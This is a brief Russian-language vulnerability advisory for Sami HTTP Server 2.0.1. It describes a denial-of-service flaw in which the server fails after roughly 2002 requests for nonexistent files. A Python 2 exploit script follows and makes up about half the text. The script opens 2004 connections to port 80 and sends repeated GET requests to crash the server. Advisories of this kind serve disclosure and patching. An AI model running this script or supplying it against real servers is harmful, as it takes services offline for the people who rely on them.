Программа: Sami HTTP Server 2.0.1
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за того, что сервер не может обработать более чем 2002 запроса к несуществующим файлам, страницам, папкам. Атакующий может передать большое число запросов, что приведет к отказу сервера в обслуживании.
Эксплоит:
#!/usr/bin/env python
import socket
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (0,2004):
request = "GET /some.txt HTTP/1.0 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Unable to connect. exiting."
